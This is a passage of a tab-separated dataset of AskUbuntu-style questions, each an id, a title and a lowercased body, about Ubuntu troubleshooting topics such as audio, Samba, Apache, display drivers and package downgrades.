ensure i do use it or replace it with something else ? my magic mouse is second hand , so i have no way of knowing if it is paired to another computer . it quite possibly is but would be either impossible or at least very difficult for me to track down that computer . does the magic mouse have its own memory and can this affect its ability to connect to my computer ? thank you again .
23897	how do i use my headphones and microphone ?	the headphones and microphone on my ubuntu 10.10 work fine . but when i start an audio conversation using empathy or pidgin , my computer hangs , the microphone does n't work , and i ca n't record anything . i have tried sudo alsa force-reload , i have installed pavucontrol , but nothing works . i ca n't increase the volume of the headphones and master channel using alsamixer though they are unmuted . ( everything works fine in fedora and windows xp . ) how do i fix this ? thank you .
23898	error : package has no installation candidate	i want to install nautilus-open-terminal on my 64 bit lucid lynx and i 'm getting this : antonio @ antonio-desktop : ~ $ sudo apt-get install nautilus-open-terminal reading package lists ... done building dependency tree reading state information ... done package nautilus-open-terminal is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'nautilus-open-terminal ' has no installation candidate how can i solve this ?
23899	empathy chat status timeout	when i have my empathy chat status set to `` available '' , i 'd like it to get set to `` away '' when i lock my computer of the screensaver kicks in . it seems that it stays set to `` available '' as i frequently have people initiate chats when i 'm actually away . i was under the impression that the status control as i desire was supposed to be built in . is there some configuration option i 'm missing ? will i get the behaviour i want if i go back to pidgin ?
23901	how to connect to windows xp ( guest os ) of the virtualbox from ubuntu using tsclient	i have ubuntu os and running windows xp on virtual box of ubuntu as my guest os . i wanted to know how can i be able to connect to my guest os - windows xp of virtual box using tsclient . when i try to connect using rdp protocol of tsclient i am getting following error message : thank you .
23904	samba fails to install	i am running xbmc , which is built around ubuntu 10.04 . it does not come with samba pre-installed , and i need to share some media with a couple other boxes . i followed the think geek directions found here . i had it all set up a couple days ago , and thought i was in the clear . i rebooted this evening and when it came back up samba was not started . i determined this by trying access the samba shares , and it would return there was an connecting to the server . i can ssh into it , so i know it is connected . in my inifinite wisdom , i figured i just messed something up and would just uninstall and reinstall . so i did : sudo apt-get purge samba and sudo apt-get purge smbfs . then tried to follow the tutorial above again . the what i get after running sudo apt-get install samba smbfs is reading package lists ... done building dependency tree reading state information ... done suggested packages : openbsd-inetd inet-superserver smbldap-tools ldb-tools ufw smbclient the following new packages will be installed : samba smbfs 0 upgraded , 2 newly installed , 0 to remove and 5 not upgraded . need to get 0b/8,131kb of archives . after this operation , 22.6mb of additional disk space will be used . preconfiguring packages ... selecting previously deselected package samba . ( reading database ... 57098 files and directories currently installed . ) unpacking samba ( from ... /samba_2 % 3a3.4.7~dfsg-1ubuntu3.2_i386.deb ) ... selecting previously deselected package smbfs . unpacking smbfs ( from ... /smbfs_2 % 3a3.4.7~dfsg-1ubuntu3.2_i386.deb ) ... processing triggers for ureadahead ... setting up samba ( 2:3.4.7~dfsg-1ubuntu3.2 ) ... generating /etc/default/samba ... update-alternatives : using /usr/bin/smbstatus.samba3 to provide /usr/bin/smbstatus ( smbstatus ) in auto mode . smbd start/running , process 2963 **start : job failed to start** setting up smbfs ( 2:3.4.7~dfsg-1ubuntu3.2 ) ... the bold is my own emphasis . so i am not sure what i messed up here , or how to get back to where it was . though i am pretty sure i made it worse than it is . i found where the logs are located , /var/logs , and found this line that seems to be the culprit . jan 29 11:59:34 xbmclive smbd [ 2806 ] : error opening config file so it seems to not create the configuration files . is there a way to get samba to try to recreate them again ?
23907	changing brightness on a sony vaio laptop	i just installed ubuntu 10.10 on a sony vaio laptop . the brightness functions keys do n't change the brightness . when i try to change the brightness i can see the levels going up and down in the notification bubble but it does n't actually change the brightness . is there any way to fix this ?
23912	is there any way to use the audio input of a 13 '' macbook pro ?	first question here ! i have a 13 '' macbook pro with ubuntu 10.10 and i get every piece of hardware working without problem ... but sound input . my machine can reproduce sound correctly , but i can record nothing . the 13 '' macbook pro only has one jack connector for both , input and output . how can i solve this ? thanks in advance .
23915	how do i get my art usb dual pre preamp to work ?	i am using audacity . i have an art usb dual pre preamp . ubuntu is not recognizing it whatsoever . i am able to record in audacity , but it is using the mic that is built into my computer ( which is a compaq presario cq50 ) instead of the one plugged into the preamp . how do i get ubuntu to recognize the preamp that is plugged into my computer ? something tells me it has to do with the installation of the preamp software . it came with a installation cd , but when i go to `` install '' , the nothing happens . i can view what is on the cd , but there is no installing of anything . please help !
23917	why wo n't unity include these simple features ?	every respected dock out there ( docky , awn , cairo dock ) has these 2 important features that i really consider a must : the ability to re-size them ( someone may like smaller or bigger icons than the default ones ) the ability to change their position ( bottom , left , right ) in unity ( which let 's face it , is a dock ) i heard that it will not be possible even in the long run to have these features implemented . in my opinion ubuntu is reinventing the wheel here , because so far unity does n't offer a thing more than , for example docky ( they are offering even less ) and they are doing it the wrong way by not including some simple and very necessary options that i think everybody wants , that 's why they are present in the other docks . in mac os x , the apple logo is in the left , the min , max , close buttons are on the left , but still you can resize and position your dock wherever you want . so again , my question is : is there any really plausible explanation why unity will not include these simple features ?
23919	sign out of ubuntu single sign-on account in software center reviews	will the ubuntu software center get an option to sign out of your ubuntu single sign-on account ?
23920	application specific environment variable settings	i 'm trying to work around a known bug in ubuntu 9.10 , where using the scrollbar in emacs causes text to be highlighted , and the cursor to move . this page here shows that you can fix this by setting an environment variable before launching emacs : $ gdk_native_windows=1 emacs so a lazy fix would be to alias `` emacs '' in my .bashrc : alias emacs= '' gdk_native_windows=1 emacs '' this , however , has the drawback of setting this environment variable for all subsequent commands run from that shell . is there any way to set gdk_native_windows=1 for just emacs , whenever i run emacs ?
23924	when i full-screen a flash video , it takes over both monitors	if i play a hulu video in a browser on one monitor and then click the `` full-screen '' button , the video takes over the whole screen . but a glitchy copy of the video also takes over my second screen . but i 'm not running my two monitors in mirror mode . i 'm using a radeon hd 4650 graphics chip .
23926	how do i change the desktop conky appears on with dual desktops ?	i recently purchased a new monitor for my laptop , and i 'm using it for dual desktops . i 'm using my new monitor as the primary `` desktop '' instead of my laptop screen . however , conky is still on my laptop 's screen . how can i move conky onto my main monitor ?
23929	how can i run openbox using the gnome/openbox session ?	i want to be able to run openbox as my window manager while running gnome . if i install openbox , i get the additional choices at the gdm login window of a 'gnome/openbox ' and an 'openbox session ' . if i log in with the 'openbox session ' , it starts openbox successfully . however , if i log in using the 'gnome/openbox ' session so that i can run gnome but just replace metacity with openbox , i find that openbox does not start , and that metacity is managing my application windows . it looks something is not working in the gnome/openbox session in 10.04 ( and possibly other versions of ubuntu ) . i know that i can manually replace metacity with openbox by typing 'openbox -- replace ' , but i want to know the correct way of starting openbox in a gnome environment automatically at logon .
23930	blank screen ... no bios loading screen either	i do n't even know how long it 's been but i had given up . until now . my screen does not come on at all , not even and the bios loading screen . i have to connect it to my tv in order to see . but there 's one thing that has always started it back up , and that is by running a hardware diagnostics * provided by dell* . it is definitely has something to do with ubuntu . i know that for sure , because i remember running an update and bam . that was it for the screen . how could i restore my screen back to life ? i have a nvidia braphics card .
23932	how do i replace the desktop by an application ?	sometimes it may be needed that a user only has access to a certain application . running the desktop environment then may be unwanted be it either for security reasons or for acchieving a better accessibility to the given application . in these cases it may be desired to replace the desktop by an application that runs immediately after login . other users should have a normal access to their desktops .
23936	how do you administer cups remotely using the web interface ?	i have an ubuntu server in my apartment and i just got a printer , so it 's time to share ! in the past i 've used cups on my desktop and i 'd just point the browsers to localhost:631 to set things up . can i used the web based admin tools remotely ? i 've been playing with the /etc/cups/cupsd.conf file and am currently at the point where i can direct a browser on my lan to server-ip:631 but i 'm getting the 403 forbidden error . if it 's not possible or it 's a bad idea for security reasons to allow remote administrator of cups , would it be possible to accomplish this using an ssh tunnel to the sever ?
23941	how to access an encrypted ntfs partition ?	i have a partition encrypted with kaspersky kryptostorage in windows xp . i reinstalled windows xp and am now no longer able to access the partition . how can i mount that ntfs partition and access its data from the ubuntu 10.10 live cd ? i do know the password .
23942	ubuntu slows down over time ?	about a few months ago i was using ubuntu ( doing something in the command line ) when it started lagging really bad . i would hit s ( or any other key ) and like 20 seconds later it would show up in my terminal . naturally i killed the machine and rebooted . the system started working just fine , but about 30 minutes later it did the same thing . now i 'm forced to use ubuntu in 30 minute spurts . i 've looked at my running processes and none of them are taking large amounts of cpu or ram . luckily i 've dual-booted so i could still use my machine . now i need to get this fixed and i 'm wondering what my options are . will i be forced to do a fresh install or is there another way ?
23948	show notifications with notify-send when application is full screen ?	is it possible for notify-send to show notifications even if there is application opened in full screen ( e.g . chromium , hit f11 ) ? currently , it does not appear .
23950	five years old ubuntu system - dist-upgrades always went fine , however some tasks remain	i have a pc with a current ubuntu distribution installed . i 've upgraded many times since 5.10 . it always went well , however some tools or features were kind of left behind in a unsatisfactory state : grub to grub2 - is it an really necessary to switch the boot loader some time to grub2 . upgrading this scares me a bit . i still have ext3 devices - is it worth upgrading to ext4 ? should i wait for btrfs ? hibernation and suspend - it only worked in 5.10 , since 6.04 it was messed up . should i really care ? any chance to repair this myself ? simply by cleanup or hacking config files . it is a desktop pc after all . so energy saving functionality is not really needed . i am using vmware workstation 6.5 and the latest kernel that supports it is 2.6.32 . this is my default kernel now , ignoring 2.6.35 . am i missing anything important in the new kernel now ?
23953	dell synaptics touchpad 's middle mouse button gets mapped as normal click	how do i make the middle touchpad 's button work ? xinput -- test 11 yields button press 1 button press 1 for pressing both the left and the middle button . i have tried to do xinput set-button-map 11 1 4 2 and so on , but as the -- test shows that button 1 is being depressed , then probably the issue is at a lower level than with x11 's perception of what mouse buttons i 'm pressing ( or assigning button-map 11 1 2 3 and clicking the right button in firefox , would n't trigger the middle-click on the link )
23955	how to solve the problem booting fglrx 8.780 + kernel 2.6.35-25 ?	the situation before this all happened is pretty standard . i have a hp pavillion dv5 laptop with an ati mobility radeon 4200 series . it always worked fine with ubuntu for as long as i can remember . however , at one point , something happened and truly made a majestic mess of things . it might 've been extra repos i enabled with ubuntu tweak - i do not know . but something made it so that my system would not boot any longer . and when i say `` wo n't boot '' , this is what i mean : - durning a normal bootup , any entries ( except windows ) selected with grub ( or burg , not even sure which one i 'm using anymore ) will spawn the ubuntu loading screen - then try to start x ( or gdm ) 5 times . the screen goes to dark , black and back to the ubuntu loading screen . then it just stays there until i spawn another tty . i have no idea what is happening or why . there are no errors in my logs , and i 'm truly at a loss here . i 've linked three files : xorg.0.log , the output of dmesg and the gdm log : xorg.0.log : http : //ubuntu.pastebin.com/tpvkc2tc dmesg : http : //ubuntu.pastebin.com/nd5ayj45 gdm 's :0.log : could n't post due to lack of points : ( let me know if any of you more knowledgeable folks can restore some sanity in my life . any help is greatly apreciated .
23957	error 500 with euca2ools uec ( enterprise cloud )	i have been setting up ubuntu enterprise cloud . when i visit `` 192.168.2.14:8443 '' in my browser i get : but when i visit `` 192.168.2.14:8773 '' ( which is the url of euca2ools , right ? ) i get : whats wrong ?
23960	how do i set up a network installation ?	i want to know if the official 700mb installation images can be used to do a network installation . what would be the easiest way to do it ?
23962	how to make the tv tuner in the dell mini 1010 work ?	i need some help in fixing up the tv tuner in my dell mini 10.10 in ubuntu . it worked in windows with dell 's default dell digital tv . i 've tried using kaffeine but that did n't work .
23966	how do i connect to a wireless access point ?	i have lubuntu 10.10 i think ... running on an old machine but it runs well . but i can use the terminal to see all my wireless cards but is there an easy way to connect to a wireless access point . once again answers are very appreciated
23967	why there is considerable difference in moving speed between touchpad and usb mouse ?	why there is considerable difference in moving speed between touchpad and usb mouse ? the mouse is ok , but touchpad is very slow . why is this happening and how to fix it ?
23968	why are n't there any updates showing up ?	i tried everything , but ubuntu simply does n't show any updates . how do i resolve this ?
23969	widescreen web camera will only show in standard definition in cheese	how do i make it show in a wide screen resolution ? the camera is a logitech c270 .
23979	mouse cursor freezes randomly with intel gma 950	i 'm using ubuntu 10.10 its installed using wubi , dual boot with windows . it 's fresh install . randomly mouse cursor freezes and ca n't click anything on the screen . i can move mouse but ca n't click . `` it causes when select a text something '' so i 'm using keyboard to to reboot system . then it back to normal after reboot . tried with unplugging-plugging mouse do n't work . pc : asus laptop with intel gma 950 graphic card . a4 tech optical mouse . ubuntu 10.10 completely updated and upgraded . how can i get around this ?
23986	is it possible to control horizontal letter spacing in vim ?	is it possible to control horizontal letter spacing in vim ( ubuntu ) ?
23987	how can i roll back xserver-xorg-core and xserver-common ?	a recent update to xorg broke my desktop , which now looks like this : in short , the desktop background is not updating on the secondary display . ( and if there is no secondary display , the primary display background stops updating . ) looking into the history , i found that this happened right after upgrading two packages : xserver-xorg-core xserver-common these were upgraded to 1.9.0-0ubuntu7.3 . i 'd like to downgrade these packages . how do i do that ? i 've checked that both have another version in the maverick repo : xserver-xorg-core : installed : 2:1.9.0-0ubuntu7.3 candidate : 2:1.9.0-0ubuntu7.3 version table : *** 2:1.9.0-0ubuntu7.3 0 500 http : //fi.archive.ubuntu.com/ubuntu/ maverick-updates/main amd64 packages 100 /var/lib/dpkg/status 2:1.9.0-0ubuntu7 0 500 http : //fi.archive.ubuntu.com/ubuntu/ maverick/main amd64 packages however , apt wo n't let me downgrade them : ville @ fluxx ~ % sudo apt-get install xserver-common=2:1.9.0-0ubuntu7 xserver-xorg-core=2:1.9.0-0ubuntu7 the following packages have unmet dependencies : xserver-xorg-core : depends : xserver-xorg but it is not going to be installed e : broken packages and this is the reason : ville @ fluxx ~ % sudo apt-get install xserver-common=2:1.9.0-0ubuntu7 xserver-xorg-core=2:1.9.0-0ubuntu7 xserver-xorg-core the following packages have unmet dependencies : xserver-xorg-core : depends : xserver-common ( > = 2:1.9.0-0ubuntu7.3 ) but 2:1.9.0-0ubuntu7 is to be installed e : broken packages am i out of options here ?
23989	ca n't see php files in emac 's speedbar ?	i just downloaded emacs 23 and installed the nxhtml add-on . i opened speedbar with m x : speedbar . i can see almost all file types except php . any suggestions ?
23990	can certain system-hungry modules be disabled ?	let me add some context : i am currently using ubuntu 9.10 64-bit ( desktop ) on a relatively powerful stationary pc ( intel core i7 920 , 12gb ram ) . my purpose is highspeed imaging with a pointgrey grashopper machine-vision camera ( for research , phd project ) . this camera is capable of 200 fps at full vga ( 640x480 ) resolution . the camera is connected using firewire ( 1394b ) and the drivers and software from pointgrey works great . i have developed a console c++ application that can grap a certain number of frames to preallocated memory and after this also save the grapped frames to harddrive . currently it works fine but sometimes i am observing a few framedrops ( 1-3 ) . when this happens i reset the experiment and repeat the recording and usually i am lucky the second time with no framedrops ( the camera-driver has a internal framecounter that i am using ) . question : i usually go to tty1 and use `` sudo service gdm stop '' to disable the graphical frontend . it seems to release some memory though that is not my main concern . my concern is cpu resources . are there other system hungry modules that can be disabled temporarily such that the cpu gets less busy on ubuntu 9.10 ? at some point in the future i will update to 10.10 . should i perhaps option for the server edition instead ? thanks .
23991	software and scanner for scanning photographic slides ?	i am searching for software and hardware for scanning slides to import to digitize my old pictures.. i have already a scanner working in windows , but i would like to scan them directly in ubuntu . ubuntu 10.10 scanner : : zolid lsusb output : omnivision technologies , inc. veho filmscanner
23993	how do i disable the new invisible border feature ( ruins compiz ' grid plugin ) ?	a new feature was added recently that adds an invisible border around the windows to grab for resizing ( although i thought the new resize grip solved any big issues ) . this annoys me because it destroys the usefulness of the grid plugin of compiz.. i 'm not sure if the border is part of compiz or gnome , but i 'd like to know how to disable it . i could n't find any options in ccsm or the window settings in gnome . see the screenshot to see how much waste is caused . these windows should match up instead of having blank space surrounding all of them .
23997	how to reboot using an updated kernel with kexec ?	is it possible to reload the kernel using kexec after a kernel upgrade without doing a complete reboot ? the ubuntu wiki rapidreboot page explains how to perform that using init.d commads , any fast way ( i.e . a script ) for doing that only on explicit request ?
23998	driver for sound blaster x-fi hd	do anyone know if there is drivers for sound blaster x-fi hd ? and if not , is there any other good external soundcard that includes headphone amps ? i bought some sennheiser 595 hd headphones , and need a card that can drive them .
24000	sound juicer does n't respect lame 's codec settings when ripping cds	using sound juicer i am able to rip cds very conveniently . i would like to rip them in about 256 kbit/s variable bitrate . to accomplish this i have defined the settings for mp3 in gnome-audio-profiles-properties as follows : audio/x-raw-int , rate=44100 , channels=2 ! lame name=enc mode=0 vbr-quality=0 ! id3v2mux where vbr-quality=0 should give me a variable bitrate averaging 245 kbit/s . the resulting files however always say they are in 128 kbit/s . when i change vbr-quality from 6 to 0 all resulting files differ in exactly 1 byte only when comparing them with cmp file1.mp3 file2.mp3 . this means vbr-quality settings have no effect here .
24001	how do i import/convert vhs videos to dvd ?	can somebody recommend me hardware and software to import vhs videos to dvd 's ?
24002	will there be an option in the gui to change the week-starting day in unity ?	this has been problematic for me in ubuntu since i live in the uk but want the week to start on a sunday ( because that is the system my work use ) . i 've faffed about in the last couple of versions of ubuntu to no avail ( it changes in evolution but not on the desktop calendar etc . ) and do n't want to be editing locale files . i understand it 's probably an issue with gnome so are there any plans to implement it with unity ? i find it baffling that an operating system does n't have such a simple option that even my phones always seem to have had .
24005	mouse wheel on dell vostro v13	i have a dell vostro v13 , which canonical claim is `` certified '' for ubuntu . so it surprises me that the synaptics trackpad is n't recognised as such and defaults to psmouse emulation . this means no multitouch , no gestures , and more importantly , no mousewheel scrolling . because it 's not loading the synaptic driver , running gpointing-device-settings does n't help . i 've found this bug which suggests a fix has been committed , but i ca n't see a way of getting this loaded on my maverick build . i 've tried backports and proposed repos in synaptic , but no joy . any ideas ?
24006	how do i reset a lost administrative password ?	i 'm working on a ubuntu system . my client has completely forgotten his administrative password . he does n't even remember entering one ; however it is there . i 've tried the suggestions on the website and i have been unsuccessful in deleting the password so that i can download applets required for running some files . do you have a solution ?
24011	how to speed up ssh login using a public key and putty ?	i am using putty to log into my local server , but it takes about 1.5 seconds to log in ( from the click on 'connect ' to working command prompt , most of time is spend on `` authenticating with public key ... '' ) . i know many see even slower speeds , but i would like to have not more than 0.1 sec . login time . i already set usedns=no , allowed only ipv4 in the putty client , and reduced key length from 4k down to 1k . any other suggestions to speed it up even further ?
24012	ca n't fix plymouth resolution by any means	due to a bad update to 11.04 i had to completely reinstall ubuntu , now i got everything pretty much the way it was before , except for plymouth.i 've tried every script i found , every turorial i 've found , i 've installed plymouth manager , i 've installed a plymouth theme that worked before ... and still , just plain white text , if it feels like showing me something , 'cause at times i do n't even get to see the text mode , so , is there anything i can do witthout removing the ati driver ? , can i get rid of plymouth if it 's not going to properly work ? , are there an alternatives to plymouth ?
24017	can i install some debs from ubuntu on debian lenny or squeeze to get nice font rendering ?	i 'm currently in font hell . i have both debian lenny and ubuntu lucid machines ; the font rendering in lucid is beautiful out of the box but lenny is still ugly even after hours and hours of messing with configuration . ( imo - i realize this is subjective . ) obviously ubuntu is doing something right . can i simply install a few packages from ubuntu on my debian box and have it work ? if so , which are the relevant packages ( cairo , freetype , xft are the libraries which seem to keep getting mentioned ) ? and which is the right version of ubuntu to pull from ? i 'm currently on lenny but i could upgrade to squeeze . alternately , are there patches i can pull from the ubuntu deb sources that i can apply to to the corresponding debian versions and rebuild ?
24018	adding user to chroot environment	i 've created a chroot system in my ubuntu using schroot and debrootstrap , based on minimal ubuntu . however whenever i ca n't seem to add a new user into this chroot environment . here is what happens . i enter schroot as root and add a new user 'bob ' . ( tried both adduser and useradd commands ) the username 'bob ' lists up in /etc/passwd file and i can 'su ' into the user 'bob ' . so far so good . when i log out of schroot , and re-enter schroot , the user 'bob ' has vanished ! ! there is no mention of bob in /etc/passwd either . how do i make the new user permanent ?
24020	music library will not load in ubuntu one music app for android	i keep getting the error message `` did n't understand the response from the server '' when i open the music library tab in the ubuntu one music app for android . i can do random play or random albums from the main page , but i ca n't view my whole library . i am using a motorola droid 2 .
24021	can not connect to internet after using windows xp on dual booted machine	i have a dual booted windows xp and ubuntu 10.10 box ( amd64 ) and i have an unusual problem in that after connecting to the internet on windows . i can not connect using ubuntu . i do n't believe it is actually a problem with configuring my ubuntu connections because when i get up in the morning ubuntu connects without any problem - this problem only exists ( and persists for at least several hours ) , if i try to connect using ubuntu immediately after connecting using windows , so i do not know how long the problem actually lasts because i usually just go to bed and then in the morning i can connect without problems . it is not problem with my provider 's service as i have a second ubuntu 10.10 box which i manually connect and works even when the dual booted one ( on ubuntu ) wo n't . it is a particular problem with the dual booted box . a power down reset does not solve the problem .
24022	how can i backup my repositories ?	i want to backup all the repositories i added to the ubuntu software center , but apparently sources.list contains only the ones which belong to canonical . so where do i find the other ones ?
24025	ca n't start apache2 ?	i have installed apache2 . but there is a problem with starting apache2 after update . apache2 : syntax error on line 215 of /etc/apache2/apache2.conf : can not load /system/library/apache/modules/mod_include.so into server : /system/library/apache/modules/mod_include.so : can not open shared object file : no such file or directory
24027	how can i resize an ext root partition at runtime ?	how can i increase the size of the root partition of a system at runtime ? i have a partition that is not allocated after the root partition ( which is also ext4 ) , how can i add that unallocated space to the space allocated to the root partition without having to shutdown the server ?
24029	how to detect creative sound blaster audigy 2 ?	i have installed a pci 7.1 sound card creative sound blaster audigy 2 , on my 10.10 ubuntu 64 bit installation . i have disabled the on board sound card from bios . i boot and the system can not recognize my `` new '' sound card . when i execute aplay -l i get this responce : aplay : device_list:235 : no soundcards found ... i take a guess and i think it is probably something wrong with my sound modules .
24032	how to add weather forecast on desktop ?	currently ubuntu shows the weather information of your selected cities in the calendar indicator . there is also an applet for gnome panel that shows forecast for us & canada cities only . what is the best option to add more weather information including forecast ( such as five-day forecast ) on the ubuntu desktop ?
24034	i can not adjust the brightness of my acer travelmate 4740 laptop	i can not adjust my laptop 's brightness . what can i do ?
24044	cutting desktop power usage	i 'm on a general energy saving mission . i 've finally swapped my old crt monitor for a lcd , so the next step it to optimise the pc power usage . it 's using an amd 64 x2 4600+ cpu which i know can trottle down , but seems to be running at a constant 2.4ghz . a while back i heard about granola . i 've installed it , but when i try to run it ( via sudo granola ) i get granola [ 10568 ] : error opening scaling governor file '/sys/devices/system/cpu/cpu0/cpufreq/scaling_governor ' in read mode granola [ 10568 ] : is cpufreq enabled in this kernel and do you have a cpu which supports dvfs ? granola [ 10568 ] : ca n't manage dvfs for any cpus i 'm happy to use other applications if granola is not optimal or viable , but am not looking to invest in new hardware just now . running kernel 2.6.35-25-generic
24048	suspend fails ( reboot on resume ) and no hibernate option	upgraded from 10.04 to 10.10 removed hibernate option for me and introduced the problem where by after entering standby ( being indicated by blinking amber led on my laptop ) i can not resume my session . instead i get a crash and system reboots ( crash comes instantly on trying to resume ) . tried clean install to eliminate possibility of an upgrade issue but its still persistent . all latest updates installed . tried looking for an answer to this but still no joy . laptop is sony vgn-fw41e .
24051	how do i reset gnome-open/xdg-open to actually open with my preferred browser ?	somehow gnome-open and xdg-open are now hopelessly broken . setting my default browser in system - > preferences - > preferred applications changes nothing . when i click on any link that points to a webpage , it opens a new tab page in chromium ( or my home page if i set one ) . is there any way to fix this ?
24053	why is kernel `` rescheduling '' causing so many wakes-from-idle ?	powertop reports that the majority of wakeups are being caused by [ rescheduling interrupts ] , [ kernel scheduler ] , and [ kernel core ] . what are these , and can i do anything to reduce the number of wakeups they are causing ?
24057	why are my rhythmbox controls ( pause , play , etc . ) missing from the sound menu ?	rhythmbox is located in the sound menu ( the tray applet where you monitor volume ) , however when i click it , it does n't respond whatsoever . when i open rhythmbox through applications > sound & video , it loads just fine . the only problem here is that the control buttons are missing from the sound menu applet in the tray ( pause , play , forward , rewind ) . any fixes ?
24058	how to set up a default system configuration ( packages , config ) ?	i need a way to customize my system automatically either at install time or right after . example ( system just finished installing ) : install a custom list of packages ( e.g . gimp , inkscape , certain plugins ) uninstall others ( e.g . evolution ) set certain options ( e.g . +ntp ) replace standard config with custom config ( e.g . /etc/sshd/* ) i 'm talking about an automatic way to do that .
24059	program to automatically generate subtitles using speech-to-text ?	i have a video that i want to create subtitles for . is there a program that can perform rudimentary speech-to-text in order to set the correct start/stop of each individual subtitle create rudimentary text subtitles ( using some sort of speech-to-text ) i know about gnome-subtitles . however , it requires extensive effort to create those subtitles manually . you need to select yourself the start and stop for each sentence . youtube has the above features ( creates rudimentary text subtitles at the correct timings , using speech-to-text ) . however i would rather not upload the videos to youtube just to get my subtitles . is it possible to do the subtitles efficiently in ubuntu ? update : i plan to use the .srt subtitles only , and do not need to hard code them on the videos . my biggest requirement is to have the program automatically find the start/stop for each sentence , so that i write the text in it . update # 2 : there is speech-to-text software for linux , with the cmu sphinx package . it is possible to use cmu sphinx with a subtitle program according to http : //sourceforge.net/projects/cmusphinx/forums/forum/5471/topic/3949891 in addition , one subtitle tool is aware of this cmu sphinx feature , http : //groups.google.com/group/universal-subtitles-testing/browse_thread/thread/613361ffb921b43b ( web based tool ) , however there is no reference in the latest source code that they added cmu sphinx . the quest continues to find a program that uses cmu sphinx for rudimentary speech to text ( which would set the correct timings as well ) , as youtube already does .
24060	how to download a whole ftp site using command line ?	i need to download an ftp site ( a web site source code actually ) containing a very high quantity of relatively small files ( downloading it with filezilla took more than a day , but i believe it could be downloaded much faster if many files were downloaded at once ) . unfortunately there is no ssh access to the site and no way to archive the files on the server side . so at least the question is how to download a whole ftp site into a folder using command line tools . a better it 'd be if the download could be parallelized by downloading many files simultaneously instead of one by one .
24063	how do i add content to an iso image ?	i have 10.10 cd iso image . i want to add ubuntu manual to this iso image such that , after burning this iso image to cd , in live cd mode and after installation that ubuntu manual should appear in the desktop . i am using acetoneiso . i wanted to know the location in iso image where to add the manual .
24064	how do i integrate a folder into an iso image ?	i just ca n't seem to figure this out . i tried acetoniso , but the file is only 43mb ( the folder is ~ 800mb ) . i also tried a windows tool called imgburn , but same thing happened . how can i add the folder to a bootable iso image , ( it 's a remastered ubuntu ) ?
24068	virtualhost and 403 forbidden problem with apache	i have the exactly same problem as in 403 forbidden error when accessing enabled virtual host , but i tried the provided solution and still receiving 403 forbidden , my site is called project , and it 's cofiguration file in /etc/apache2/sites-available is the following : < virtualhost *:80 > serveradmin webmaster @ reweb servername www.online.project.com errorlog /logs/project-errors.log documentroot /home/joarobles/zend/workspaces/defaultworkspace7/online.project.com.ar/public < directory /home/joarobles/zend/workspaces/defaultworkspace7/online.project.com.ar > order deny , allow allow from all options indexes < /directory > tried to change the owner of /home/joarobles/zend/workspaces/defaultworkspace7/online.cobico.com.ar to www : data : www-data with recursion , but still getting this error in project-errors.log : [ mon jan 31 01:26:01 2011 ] [ crit ] [ client 127.0.0.1 ] ( 13 ) permission denied : /home/joarobles/.htaccess pcfg_openfile : unable to check htaccess file , ensure it is readable any idea ? thanks !
24070	how can i open the containing folders of items in nautilus search results ?	after searching for a file in nautilus , how can i open its parent folder ?
24072	how are typical users expected to read the documentation in /usr/share/doc ?	i recently learned that there is a huge pile of documentation in /usr/share/doc . it seems like much of it is gzipped so that it is not directly accessible without administrative privileges : $ gunzip examples/letter.tex.gz gzip : examples/letter.tex : permission denied while one solution to this would be for every user to duplicate each item in their home directory just to read it , this arrangement hardly seems conducive to regular browsing . how do normal people read this documentation ? i am not inclined to believe that the typical user is expected to install and maintain a web server just to read local text documentation .
24073	how do i install the hp f4280 printer ?	how do i install the hp deskjet f4280 all-in-one printer ?
24074	high i/o wait after login	i 've noticed that the ubuntuone-syncdaemon hogs up the hard disk every time i log in to ubuntu ( 10.04 ) . this takes up to two or three minutes , which makes ubuntu insufferably slow . opening firefox is okay , but the browser is constantly greyed out and lags horribly . given that i often shut down my laptop when i do n't use it ( about 3 to 4 times a day ) , this makes ubuntu lose much of its lustre because of its long boot time . is this a normal behaviour of ubuntu one ? is it intended ? note that i 've actually posted this in the forums here , but i received only few replies .
24075	synchronising cut-and-paste activities in ubuntu one	this was posted in the ubuntu forums but received no response , so i 'm re-posting it here ( with minor updates ) in hopes that it will at least get some comments . recently , i moved a large amount of contents ( a few gbs ) within the ubuntu one folder ( through cut-and-paste ) . then i discovered how ubuntu one does this is to remove them on the server side and upload all the files again in the new location . obviously , this is undesirable because of the hefty uploading involved . worse , since i have two computers synced to the same account , it is double the amount of traffic . each computer took about one day to finish synchronising . firstly , can anyone confirm that this is actually what 's happening when we move folders ? i 'm using ubuntu 10.04 , by the way . secondly , is there a way to cut-and-paste stuff within the ubuntu one folder without uploading again ?
24077	can you change the update interval for the hardware-monitor applet ?	i want to change the update interval of the hardware-monitor applet . there 's no setting for it in preferences ...
24078	is there any version of vim which uses the libxft library to render fonts ?	is there any version of vim which uses the libxft library to render fonts ?
24079	full disk encryption with-preseed ?	ubuntu 8.04 and later provide encryption using luks and ecryptfs . the question is how to configure preseed to do it automatically ? there is an option in preseed to encrypt user 's home , but no option for full disk encryption : d-i user-setup/encrypt-home boolean false any suggestions ? thanks in advance !
24081	why is ubuntu unmounting my primary hard drive ?	i 'm running ubuntu 10.10 on my laptop ( an asus g73j ) , dual-booting windows 7 if that matters . after using the computer for couple of hours or so , i get a popup complaining that a file was unmounted , then my gnome desktop panels disappear . i ca n't save any unsaved work ( the file browser shows `` filesystem '' as totally empty ) , and other programs break in odd ways ( like chrome ca n't browse to any new pages , but keeps current ones going ... at least i still have pandora to listen to when this happens ! ) . i 've tried looking in the system logs to no avail ; i 'm assuming that it ca n't write any errors to the logs because , of course , the logs are on the primary hard drives . this started happening maybe a few days ago . yesterday i upgraded from 10.4 , but i believe it was happening before then . any advice for figuring this out ? edit : it just happened again , and i heard a small little clicky sound from the hard drive about five seconds before things went south . i 'm thinking i should start backing up asap . in response to a comment , here 's the dmesg output : http : //askubuntu.pastebin.com/uygshbay also , the smart status says the disk has a few bad sectors , and the detailed data says there are 14 . it says it passed the self-assessment though . lastly , this does n't seem to be happening when i 'm on windows . i recently re-enabled ureadahead ( which i disabled ages ago because it was causing ubuntu to hang at the startup logo ) , could that be the source of the problem ? i 've disabled it again to see .
24083	recommend an outlook replacement	not a fan of evolution or thunderbird . is there a decent alternative to outlook on ubuntu ?
